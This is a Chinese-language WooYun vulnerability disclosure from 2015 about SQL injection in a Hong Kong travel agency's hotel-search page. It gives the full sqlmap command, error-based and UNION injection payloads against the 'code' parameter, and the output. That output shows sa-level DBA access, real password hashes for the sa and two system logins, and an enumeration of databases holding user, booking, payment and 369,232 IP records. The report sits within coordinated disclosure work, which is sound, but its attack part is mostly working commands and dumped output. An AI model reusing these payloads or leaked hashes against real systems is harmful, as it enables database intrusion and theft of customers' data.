当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0153157

漏洞标题:天洋旅遊某處存在SQL插入攻擊(DBA权限/sa密码泄露/37万用户IP信息泄露)(香港地區)

相关厂商:天洋旅遊

漏洞作者: 路人甲

提交时间:2015-11-10 09:55

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-10: 细节已通知厂商并且等待厂商处理中
2015-11-20: 厂商已经确认,细节仅向厂商公开
2015-11-30: 细节向核心白帽子及相关领域专家公开
2015-12-10: 细节向普通白帽子公开
2015-12-20: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

Any Tours's main focus of Business Activities are Corporate Business Travel Arrangements, Full Travel Management and support for M.I.C.E & EVENTS, Interest/Leisure Groups, Incentive travel for Hong Kong, China & Macau inbound /outbound, especially Special Interest Group, like Sports (Rugby, Soccer, Golf, Formula One Grand Prix) & Student Study exchange groups.
Any Tours has also invested in the training & development of experienced, energetic and service minded work force. Our team members create, design and build the most exclusive itineraries catering to our clients needs and they are the cornerstone of creating the magic, by providing quality, creativity, innovation and integrity with their great talent, passion and dedication. The company network expands over many countries and has an active working relation with like minded clients and travel industry partners from all over the world
Any Tours provides Real time Easy to Access On-line worldwide air ticketing and hotel bookings with full travel information and e -commerce capabilities. Having a presence on the worldwide web since 1997, Any Tours has secured a great place in the e-commerce business of the 21st Century and is aiming to provide high and easy accessibility to worldwide & automated travel services for clients and travel partners' conveniences 24 x 7, around the clock.
Our key words when dealing with our partners & clients are taking personal responsibility for providing the High Quality Services & Products with Efficiency, Reliability and Satisfaction with Trust.

详细说明:

地址:http://**.**.**.**/tch/Hotel/search/?action=city&code=TYO"

python sqlmap.py -u "http://**.**.**.**/tch/Hotel/search/?action=city&code=TYO" -p code --technique=EU --random-agent --batch  --current-user --is-dba --users --passwords --count


Database: Anytours
+------------------------------------------------------+---------+
| Table                                                | Entries |
+------------------------------------------------------+---------+
| dbo.IpList                                           | 369232  |

漏洞证明:

---
Parameter: code (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: action=city&code=TYO' AND 8122=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(118)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (8122=8122) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(107)+CHAR(122)+CHAR(113))) AND 'sYzx'='sYzx
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: action=city&code=-4812' UNION ALL SELECT CHAR(113)+CHAR(106)+CHAR(118)+CHAR(98)+CHAR(113)+CHAR(90)+CHAR(116)+CHAR(115)+CHAR(103)+CHAR(103)+CHAR(88)+CHAR(110)+CHAR(83)+CHAR(117)+CHAR(102)+CHAR(119)+CHAR(106)+CHAR(87)+CHAR(106)+CHAR(66)+CHAR(114)+CHAR(83)+CHAR(100)+CHAR(100)+CHAR(97)+CHAR(78)+CHAR(107)+CHAR(67)+CHAR(98)+CHAR(117)+CHAR(71)+CHAR(109)+CHAR(65)+CHAR(117)+CHAR(89)+CHAR(65)+CHAR(89)+CHAR(90)+CHAR(119)+CHAR(118)+CHAR(105)+CHAR(119)+CHAR(74)+CHAR(113)+CHAR(101)+CHAR(113)+CHAR(120)+CHAR(107)+CHAR(122)+CHAR(113)-- -
---
web server operating system: Windows 8.1 or 2012 R2
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 8.5
back-end DBMS: Microsoft SQL Server 2008
current user:    'sa'
current user is DBA:    True
database management system users [3]:
[*] ##MS_PolicyEventProcessingLogin##
[*] ##MS_PolicyTsqlExecutionLogin##
[*] sa
database management system users password hashes:
[*] ##MS_PolicyEventProcessingLogin## [1]:
    password hash: 0x01006a67a63793d7beb1fc7e4e749a49c99976069fa2e2adbc9a
        header: 0x0100
        salt: 6a67a637
        mixedcase: 93d7beb1fc7e4e749a49c99976069fa2e2adbc9a
[*] ##MS_PolicyTsqlExecutionLogin## [1]:
    password hash: 0x010021671bf66a2f269a3e02a454fa819b225e0a8d8daa68f932
        header: 0x0100
        salt: 21671bf6
        mixedcase: 6a2f269a3e02a454fa819b225e0a8d8daa68f932
[*] sa [1]:
    password hash: 0x01005175b4d432ed35abba033a7fa0874f4bd1b382b2a92d16df
        header: 0x0100
        salt: 5175b4d4
        mixedcase: 32ed35abba033a7fa0874f4bd1b382b2a92d16df
Database: ReportServerTempDB
+------------------------------------------------------+---------+
| Table                                                | Entries |
+------------------------------------------------------+---------+
| dbo.DBUpgradeHistory                                 | 27      |
+------------------------------------------------------+---------+
Database: TravelConnect_Log
+------------------------------------------------------+---------+
| Table                                                | Entries |
+------------------------------------------------------+---------+
| dbo.ReserveLog                                       | 2438    |
| dbo.AirPricing                                       | 1325    |
| dbo.UrPnrLog                                         | 1121    |
| dbo.ErrLog                                           | 45      |
+------------------------------------------------------+---------+
Database: msdb
+------------------------------------------------------+---------+
| Table                                                | Entries |
+------------------------------------------------------+---------+
| dbo.backupfile                                       | 596     |
| dbo.MSdbms_datatype_mapping                          | 493     |
| dbo.sysdatatypemappings                              | 493     |
| dbo.MSdbms_map                                       | 374     |
| dbo.backupfilegroup                                  | 298     |
| dbo.backupmediafamily                                | 298     |
| dbo.backupmediaset                                   | 298     |
| dbo.backupset                                        | 298     |
| dbo.MSdatatype_mappings                              | 260     |
| dbo.sysjobhistory                                    | 200     |
| dbo.MSdbms_datatype                                  | 180     |
| dbo.sysmaintplan_log                                 | 90      |
| dbo.sysmaintplan_logdetail                           | 90      |
| dbo.syspolicy_facet_events                           | 84      |
| dbo.sysutility_mi_smo_properties_to_collect_internal | 84      |
| dbo.syspolicy_management_facets                      | 83      |
| dbo.sysutility_ucp_policy_target_conditions          | 24      |
| dbo.sysutility_ucp_policy_target_conditions_internal | 24      |
| dbo.syscategories                                    | 21      |
| dbo.sysutility_ucp_configuration                     | 13      |
| dbo.sysutility_ucp_configuration_internal            | 13      |
| dbo.syssubsystems                                    | 12      |
| dbo.sysutility_ucp_policy_check_conditions           | 12      |
| dbo.sysutility_ucp_policy_check_conditions_internal  | 12      |
| dbo.sysschedules                                     | 9       |
| dbo.sysschedules_localserver_view                    | 9       |
| dbo.sysssispackages                                  | 9       |
| dbo.MSdbms                                           | 8       |
| dbo.sysutility_ucp_supported_object_types_internal   | 8       |
| dbo.sysmail_configuration                            | 7       |
| dbo.syscollector_collection_items                    | 6       |
| dbo.syscollector_collection_items_internal           | 6       |
| dbo.syscollector_config_store                        | 5       |
| dbo.syscollector_config_store_internal               | 5       |
| dbo.sysmanagement_shared_server_groups               | 5       |
| dbo.sysmanagement_shared_server_groups_internal      | 5       |
| dbo.sysutility_mi_smo_objects_to_collect_internal    | 5       |
| dbo.restorefile                                      | 4       |
| dbo.syscollector_collection_sets                     | 4       |
| dbo.syscollector_collection_sets_internal            | 4       |
| dbo.syscollector_collector_types                     | 4       |
| dbo.syscollector_collector_types_internal            | 4       |
| dbo.sysjobsteps                                      | 4       |
| dbo.syspolicy_configuration                          | 4       |
| dbo.syspolicy_configuration_internal                 | 4       |
| dbo.sysssispackagefolders                            | 4       |
| dbo.sysdtscategories                                 | 3       |
| dbo.restorefilegroup                                 | 2       |
| dbo.restorehistory                                   | 2       |
| dbo.sysjobactivity                                   | 2       |
| dbo.sysjobs                                          | 2       |
| dbo.sysjobs_view                                     | 2       |
| dbo.sysjobschedules                                  | 2       |
| dbo.sysjobservers                                    | 2       |
| dbo.sysutility_ucp_policy_configuration              | 2       |
| dbo.sysdbmaintplans                                  | 1       |
| dbo.sysmail_servertype                               | 1       |
| dbo.sysmaintplan_plans                               | 1       |
| dbo.sysmaintplan_subplans                            | 1       |
| dbo.sysoriginatingservers_view                       | 1       |
| dbo.syssessions                                      | 1       |
| dbo.systargetservers_view                            | 1       |
| dbo.sysutility_mi_configuration                      | 1       |
| dbo.sysutility_ucp_processing_state_internal         | 1       |
| dbo.sysutility_ucp_utility_space_utilization         | 1       |
+------------------------------------------------------+---------+
Database: Anytours
+------------------------------------------------------+---------+
| Table                                                | Entries |
+------------------------------------------------------+---------+
| dbo.IpList                                           | 369232  |
| dbo.Shopcart_CartListD                               | 334967  |
| dbo.Hotel_Item_Links_CHT                             | 120780  |
| dbo.Hotel_Item_Links_CHT                             | 120780  |
| dbo.tBookingOrderD2                                  | 116622  |
| dbo.Hotel_Item_RmCategory_CHT                        | 98821   |
| dbo.Hotel_Item_RmCategory_CHT                        | 98821   |
| dbo.Request_Value                                    | 79377   |
| dbo.Hotel_Item_Facilities_CHT                        | 72004   |
| dbo.Hotel_Item_Facilities_CHT                        | 72004   |
| dbo.Hotel_Item_RmFacilities_CHT                      | 53429   |
| dbo.Hotel_Item_RmFacilities_CHT                      | 53429   |
| dbo.Hotel_Item_Report_CHT                            | 48752   |
| dbo.Hotel_Item_Report_CHT                            | 48752   |
| dbo.sGalileoLog                                      | 45412   |
| dbo.Hotel_Item_RoomType_CHT                          | 40925   |
| dbo.Hotel_Item_RoomType_CHT                          | 40925   |
| dbo.Request_Passenger                                | 20280   |
| dbo.Request_Passenger                                | 20280   |
| dbo.an2idcity                                        | 16913   |
| dbo.GTA_XMLRequestErrorLog                           | 15834   |
| dbo.Hotel_Item_Location_CHT                          | 11361   |
| dbo.Hotel_Item_Location_CHT                          | 11361   |
| dbo.Shopcart_CartListH                               | 9458    |
| dbo.Fare_mCityPort                                   | 9286    |
| dbo.Hotel_Item_CHT                                   | 8624    |
| dbo.Hotel_Item_CHT                                   | 8624    |
| dbo.Airfare_City                                     | 6563    |
| dbo.tBookingOrderD_AirfarePax                        | 6048    |
| dbo.tBookingOrderD_AirfarePax                        | 6048    |
| dbo.tBookingOrderD_AirfarePax                        | 6048    |
| dbo.Airfare_Airport                                  | 5437    |
| dbo.tPaymentRecoed                                   | 4003    |
| dbo.mUser                                            | 3903    |
| dbo.tBookingOrderH                                   | 3362    |
| dbo.sRecLog                                          | 3306    |
| dbo.tBookingOrderEmailRecord                         | 2152    |
| dbo.mAirfare                                         | 1363    |
| dbo.Fare_FareSheet_Segment_Flight                    | 869     |
| dbo.Fare_FareSheet_Segment_Flight                    | 869     |
| dbo.Hotel_Area                                       | 809     |
| dbo.Airfare_Airline                                  | 795     |
| dbo.tBooking_ErrorRecord                             | 488     |
| dbo.tBookingOrderD_RoomPax                           | 392     |
| dbo.an2idairline                                     | 324     |
| dbo.iSecurityLevel                                   | 281     |
| dbo.iPackageGroup                                    | 261     |
| dbo.Airfare_Country                                  | 251     |
| dbo.CountryISO                                       | 249     |
| dbo.an2idcountry                                     | 248     |
| dbo.GTA_ASynchronousResponse                         | 240     |
| dbo.Package_City                                     | 237     |
| dbo.IpBlockCountry                                   | 236     |
| dbo.User_TelCountryCode                              | 233     |
| dbo.Fare_mCountry                                    | 227     |
| dbo.AirfareMarkUpPriceList                           | 181     |
| dbo.Hotel_Country                                    | 173     |
| dbo.Insurance_Destination                            | 173     |
| dbo.tBookingOrderD_RoomDesc                          | 112     |
| dbo.tBookingOrderD_RoomDesc                          | 112     |
| dbo.Package_Carrier                                  | 62      |
| dbo.LinkMap                                          | 56      |
| dbo.mForm                                            | 40      |
| dbo.News                                             | 36      |
| dbo.Advertisement                                    | 31      |
| dbo.Insurance_CodeList                               | 30      |
| dbo.Airfare_ExcludeAirline                           | 29      |
| dbo.an2idfareclass                                   | 29      |
| dbo.Airfare_Class                                    | 26      |
| dbo.Package_Country                                  | 22      |
| dbo.Cruise_CruiseLine                                | 19      |
| dbo.Cruise_CruiseLine                                | 19      |
| dbo.Insurance_PlanFee                                | 19      |
| dbo.Package_Activity                                 | 15      |
| dbo.Package_Activity                                 | 15      |
| dbo.HotelMarkUpPriceList                             | 13      |
| dbo.Cruise_Country                                   | 12      |
| dbo.ApiRecord                                        | 11      |
| dbo.AdvertisementType                                | 10      |
| dbo.Hotel_DectinationRanking                         | 10      |
| dbo.Package_DectinationRanking                       | 10      |
| dbo.mOperator_Login                                  | 8       |
| dbo.mOperator_Login                                  | 8       |
| dbo.Hotel_RoomType                                   | 6       |
| dbo.Cruise_CruiseLineRanking                         | 5       |
| dbo.Cruise_DurationRanking                           | 5       |
| dbo.Fare_FareSheet_CarrierRanking                    | 4       |
| dbo.Hotel_Currency                                   | 4       |
| dbo.Shopcart_ItemType                                | 4       |
| dbo.Cruise_City                                      | 3       |
| dbo.Cruise_City                                      | 3       |
| dbo.fSysNumberControl                                | 3       |
| dbo.fSysNumberControl                                | 3       |
| dbo.ApiAuth                                          | 2       |
| dbo.Cruise_Type                                      | 2       |
| dbo.Hotel_CityGroup                                  | 2       |
| dbo.Hotel_CityGroup                                  | 2       |
| dbo.Insurance_TravelInsuranceD                       | 2       |
| dbo.mContent                                         | 2       |
| dbo.ShopCart_TempDS                                  | 2       |
| dbo.Insurance_TravelInsuranceErrorLog                | 1       |
| dbo.Insurance_TravelInsuranceH                       | 1       |
+------------------------------------------------------+---------+
Database: ReportServer
+------------------------------------------------------+---------+
| Table                                                | Entries |
+------------------------------------------------------+---------+
| dbo.DBUpgradeHistory                                 | 31      |
| dbo.ConfigurationInfo                                | 23      |
| dbo.Roles                                            | 8       |
| dbo.PolicyUserRole                                   | 4       |
| dbo.Users                                            | 3       |
| dbo.Keys                                             | 2       |
| dbo.Policies                                         | 2       |
| dbo.SecData                                          | 2       |
| dbo.ServerUpgradeHistory                             | 2       |
| dbo.Catalog                                          | 1       |
| dbo.UpgradeInfo                                      | 1       |
+------------------------------------------------------+---------+
Database: master
+------------------------------------------------------+---------+
| Table                                                | Entries |
+------------------------------------------------------+---------+
| sys.dm_os_buffer_descriptors                         | 510030  |
| sys.dm_os_memory_objects                             | 485842  |
| sys.dm_os_memory_cache_entries                       | 111745  |
| sys.syscacheobjects                                  | 107888  |
| sys.dm_exec_cached_plans                             | 107742  |
| sys.messages                                         | 98318   |
| sys.sysmessages                                      | 98318   |
| sys.dm_exec_query_stats                              | 54866   |
| sys.fulltext_system_stopwords                        | 15829   |
| sys.syscolumns                                       | 12581   |
| sys.all_parameters                                   | 7090    |
| sys.system_parameters                                | 7090    |
| sys.trace_subclass_values                            | 5366    |
| sys.all_columns                                      | 5285    |
| sys.system_columns                                   | 4626    |
| sys.trace_event_bindings                             | 4304    |
| sys.dm_os_ring_buffers                               | 3939    |
| sys.syscomments                                      | 2997    |
| sys.dm_xe_object_columns                             | 2674    |
| dbo.spt_values                                       | 2508    |
| sys.all_objects                                      | 2002    |
| sys.sysobjects                                       | 2002    |
| sys.system_objects                                   | 1928    |
| sys.database_permissions                             | 1853    |
| sys.syspermissions                                   | 1852    |
| sys.sysprotects                                      | 1848    |
| sys.all_sql_modules                                  | 1785    |
| sys.system_sql_modules                               | 1783    |
| sys.dm_xe_map_values                                 | 1733    |
| sys.dm_os_virtual_address_dump                       | 1642    |
| sys.dm_os_performance_counters                       | 1116    |
| sys.sysperfinfo                                      | 1116    |
| sys.system_internals_partition_columns               | 822     |
| sys.columns                                          | 659     |
| sys.dm_xe_objects                                    | 542     |
| sys.dm_os_wait_stats                                 | 490     |
| sys.dm_audit_actions                                 | 454     |
| sys.spatial_reference_systems                        | 390     |
| sys.dm_db_index_usage_stats                          | 381     |
| sys.dm_exec_query_transformation_stats               | 377     |
| sys.dm_os_memory_cache_clock_hands                   | 375     |
| sys.event_notification_event_types                   | 365     |
| sys.all_views                                        | 354     |
| sys.system_views                                     | 354     |
| sys.stats_columns                                    | 352     |
| sys.dm_os_memory_clerks                              | 297     |
| sys.index_columns                                    | 271     |
| sys.sysindexkeys                                     | 271     |
| sys.trigger_event_types                              | 245     |
| sys.sysindexes                                       | 202     |
| sys.stats                                            | 194     |
| sys.dm_exec_procedure_stats                          | 182     |
| sys.trace_events                                     | 180     |
| sys.dm_os_spinlock_stats                             | 175     |
| sys.dm_os_memory_cache_counters                      | 160     |
| sys.dm_os_latch_stats                                | 144     |
| sys.allocation_units                                 | 128     |
| sys.system_internals_allocation_units                | 128     |
| sys.dm_db_partition_stats                            | 116     |
| sys.indexes                                          | 116     |
| sys.partitions                                       | 116     |
| sys.system_internals_partitions                      | 116     |
| sys.syscharsets                                      | 114     |
| sys.xml_schema_facets                                | 112     |
| sys.xml_schema_components                            | 99      |
| sys.dm_os_loaded_modules                             | 96      |
| sys.system_components_surface_area_configuration     | 95      |
| sys.dm_audit_class_type_map                          | 83      |
| sys.xml_schema_types                                 | 82      |
| sys.objects                                          | 74      |
| sys.configurations                                   | 70      |
| sys.sysconfigures                                    | 70      |
| sys.syscurconfigs                                    | 70      |
| sys.dm_os_threads                                    | 69      |
| sys.trace_columns                                    | 66      |
| sys.dm_os_worker_local_storage                       | 61      |
| sys.dm_os_workers                                    | 61      |
| sys.dm_db_session_space_usage                        | 58      |
| sys.dm_db_task_space_usage                           | 58      |
| sys.dm_exec_sessions                                 | 58      |
| sys.dm_os_memory_pools                               | 58      |
| sys.sysprocesses                                     | 57      |
| INFORMATION_SCHEMA.COLUMNS                           | 50      |
| sys.dm_os_memory_cache_hash_tables                   | 50      |
| sys.fulltext_document_types                          | 50      |
| sys.fulltext_languages                               | 48      |
| sys.dm_exec_query_optimizer_info                     | 39      |
| sys.dm_os_tasks                                      | 36      |
| sys.systypes                                         | 34      |
| sys.types                                            | 34      |
| sys.syslanguages                                     | 33      |
| sys.dm_exec_connections                              | 30      |
| sys.dm_exec_requests                                 | 29      |
| sys.dm_os_memory_node_access_stats                   | 24      |
| sys.dm_tran_locks                                    | 23      |
| sys.server_permissions                               | 23      |
| sys.securable_classes                                | 22      |
| sys.server_principals                                | 22      |
| sys.syslockinfo                                      | 22      |
| sys.trace_categories                                 | 21      |
| sys.database_principals                              | 18      |
| sys.sysaltfiles                                      | 18      |
| sys.sysusers                                         | 18      |
| sys.xml_schema_component_placements                  | 18      |
| sys.dm_os_stacks                                     | 16      |
| sys.master_files                                     | 16      |
| INFORMATION_SCHEMA.SCHEMATA                          | 15      |
| sys.dm_db_missing_index_details                      | 15      |
| sys.dm_db_missing_index_group_stats                  | 15      |
| sys.dm_db_missing_index_groups                       | 15      |
| sys.dm_os_waiting_tasks                              | 15      |
| sys.schemas                                          | 15      |
| sys.xml_schema_attributes                            | 15      |
| sys.service_message_types                            | 14      |
| sys.dm_db_script_level                               | 13      |
| sys.dm_os_schedulers                                 | 13      |
| sys.syslogins                                        | 13      |
| sys.service_contract_message_usages                  | 11      |
| sys.dm_tran_active_transactions                      | 10      |
| sys.dm_xe_session_event_actions                      | 10      |
| sys.server_event_session_actions                     | 10      |
| sys.crypt_properties                                 | 8       |
| sys.database_mirroring                               | 8       |
| sys.database_recovery_status                         | 8       |
| sys.databases                                        | 8       |
| sys.sysdatabases                                     | 8       |
| sys.certificates                                     | 7       |
| sys.dm_tran_database_transactions                    | 7       |
| INFORMATION_SCHEMA.TABLES                            | 6       |
| sys.dm_os_memory_brokers                             | 6       |
| sys.service_contracts                                | 6       |
| sys.tables                                           | 6       |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES                  | 5       |
| sys.dm_xe_session_events                             | 5       |
| sys.endpoints                                        | 5       |
| sys.server_event_session_events                      | 5       |
| sys.server_role_members                              | 5       |
| sys.dm_exec_query_resource_semaphores                | 4       |
| sys.dm_os_hosts                                      | 4       |
| sys.dm_xe_packages                                   | 4       |
| sys.internal_tables                                  | 4       |
| dbo.MSreplication_options                            | 3       |
| sys.assembly_types                                   | 3       |
| sys.dm_broker_queue_monitors                         | 3       |
| sys.dm_clr_properties                                | 3       |
| sys.dm_os_memory_nodes                               | 3       |
| sys.dm_os_nodes                                      | 3       |
| sys.dm_xe_session_object_columns                     | 3       |
| sys.identity_columns                                 | 3       |
| sys.login_token                                      | 3       |
| sys.service_queue_usages                             | 3       |
| sys.service_queues                                   | 3       |
| sys.services                                         | 3       |
| sys.sql_logins                                       | 3       |
| sys.type_assembly_usages                             | 3       |
| sys.xml_schema_namespaces                            | 3       |
| INFORMATION_SCHEMA.ROUTINES                          | 2       |
| sys.database_files                                   | 2       |
| sys.database_role_members                            | 2       |
| sys.dm_exec_trigger_stats                            | 2       |
| sys.dm_fts_memory_pools                              | 2       |
| sys.dm_resource_governor_resource_pools              | 2       |
| sys.dm_resource_governor_workload_groups             | 2       |
| sys.key_encryptions                                  | 2       |
| sys.procedures                                       | 2       |
| sys.resource_governor_resource_pools                 | 2       |
| sys.resource_governor_workload_groups                | 2       |
| sys.service_contract_usages                          | 2       |
| sys.sql_modules                                      | 2       |
| sys.sysfiles                                         | 2       |
| sys.sysmembers                                       | 2       |
| sys.tcp_endpoints                                    | 2       |
| dbo.spt_monitor                                      | 1       |
| sys.assemblies                                       | 1       |
| sys.assembly_files                                   | 1       |
| sys.data_spaces                                      | 1       |
| sys.default_constraints                              | 1       |
| sys.dm_db_file_space_usage                           | 1       |
| sys.dm_exec_background_job_queue_stats               | 1       |
| sys.dm_fts_fdhosts                                   | 1       |
| sys.dm_os_dispatcher_pools                           | 1       |
| sys.dm_os_dispatchers                                | 1       |
| sys.dm_os_process_memory                             | 1       |
| sys.dm_os_sys_info                                   | 1       |
| sys.dm_os_sys_memory                                 | 1       |
| sys.dm_resource_governor_configuration               | 1       |
| sys.dm_tran_current_transaction                      | 1       |
| sys.dm_xe_session_targets                            | 1       |
| sys.dm_xe_sessions                                   | 1       |
| sys.filegroups                                       | 1       |
| sys.linked_logins                                    | 1       |
| sys.resource_governor_configuration                  | 1       |
| sys.routes                                           | 1       |
| sys.server_event_session_fields                      | 1       |
| sys.server_event_session_targets                     | 1       |
| sys.server_event_sessions                            | 1       |
| sys.servers                                          | 1       |
| sys.symmetric_keys                                   | 1       |
| sys.sysconstraints                                   | 1       |
| sys.sysfilegroups                                    | 1       |
| sys.sysoledbusers                                    | 1       |
| sys.sysservers                                       | 1       |
| sys.traces                                           | 1       |
| sys.user_token                                       | 1       |
| sys.via_endpoints                                    | 1       |
| sys.xml_schema_collections                           | 1       |
| sys.xml_schema_model_groups                          | 1       |
| sys.xml_schema_wildcards                             | 1       |
+------------------------------------------------------+---------+

修复方案:

上WAF。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-11-20 15:17

厂商回复:

Referred to related parties.

最新状态:

暂无